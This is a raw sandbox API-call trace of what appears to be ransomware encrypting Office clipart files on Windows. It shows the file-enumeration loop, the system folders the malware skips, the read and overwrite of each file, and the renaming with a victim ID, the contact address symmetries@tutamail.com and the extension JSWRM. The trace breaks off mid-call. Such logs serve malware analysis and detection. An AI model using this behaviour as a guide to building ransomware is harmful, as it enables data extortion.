[0074.151] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6632) returned 1 [0074.151] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19e0) returned 0x24c1d0 [0074.152] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x19e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x19e0, lpOverlapped=0x0) returned 1 [0074.153] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.153] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x19e0, lpOverlapped=0x0) returned 1 [0074.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.153] CloseHandle (hObject=0x460) returned 1 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0074.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0074.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.154] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.155] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc89dc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN02724_.WMF", cAlternateFileName="")) returned 1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2=".") returned 1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="..") returned 1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="...") returned 1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="windows") returned -1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="recovery") returned -1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="perflogs") returned -1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="documents and settings") returned -1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="system volume information") returned -1 [0074.155] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="msocache") returned -1 [0074.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02724_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02724_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02724_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02724_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02724_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02724_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.156] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2108) returned 1 [0074.156] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x830) returned 0x23fc98 [0074.156] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0074.157] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.157] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0074.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.158] CloseHandle (hObject=0x460) returned 1 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0074.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0074.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.158] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.159] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN03500_.WMF", cAlternateFileName="")) returned 1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2=".") returned 1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="..") returned 1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="...") returned 1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="windows") returned -1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="recovery") returned -1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="perflogs") returned -1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="documents and settings") returned -1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="system volume information") returned -1 [0074.159] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="msocache") returned -1 [0074.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN03500_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN03500_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN03500_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0074.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN03500_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN03500_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN03500_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0074.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.160] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9240) returned 1 [0074.160] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2410) returned 0x24c1d0 [0074.160] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2410, lpOverlapped=0x0) returned 1 [0074.162] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.162] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2410, lpOverlapped=0x0) returned 1 [0074.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.162] CloseHandle (hObject=0x460) returned 1 [0074.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0074.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0074.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0074.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0074.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.163] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.163] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x928, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04108_.WMF", cAlternateFileName="")) returned 1 [0074.163] lstrcmpiW (lpString1="AN04108_.WMF", lpString2=".") returned 1 [0074.163] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="..") returned 1 [0074.163] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="...") returned 1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="windows") returned -1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="recovery") returned -1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="perflogs") returned -1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="documents and settings") returned -1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="system volume information") returned -1 [0074.164] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="msocache") returned -1 [0074.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04108_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04108_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04108_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0074.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04108_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04108_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04108_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0074.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.165] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2344) returned 1 [0074.165] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x920) returned 0x23fc98 [0074.165] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x920, lpOverlapped=0x0) returned 1 [0074.167] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.167] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x920, lpOverlapped=0x0) returned 1 [0074.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.167] CloseHandle (hObject=0x460) returned 1 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 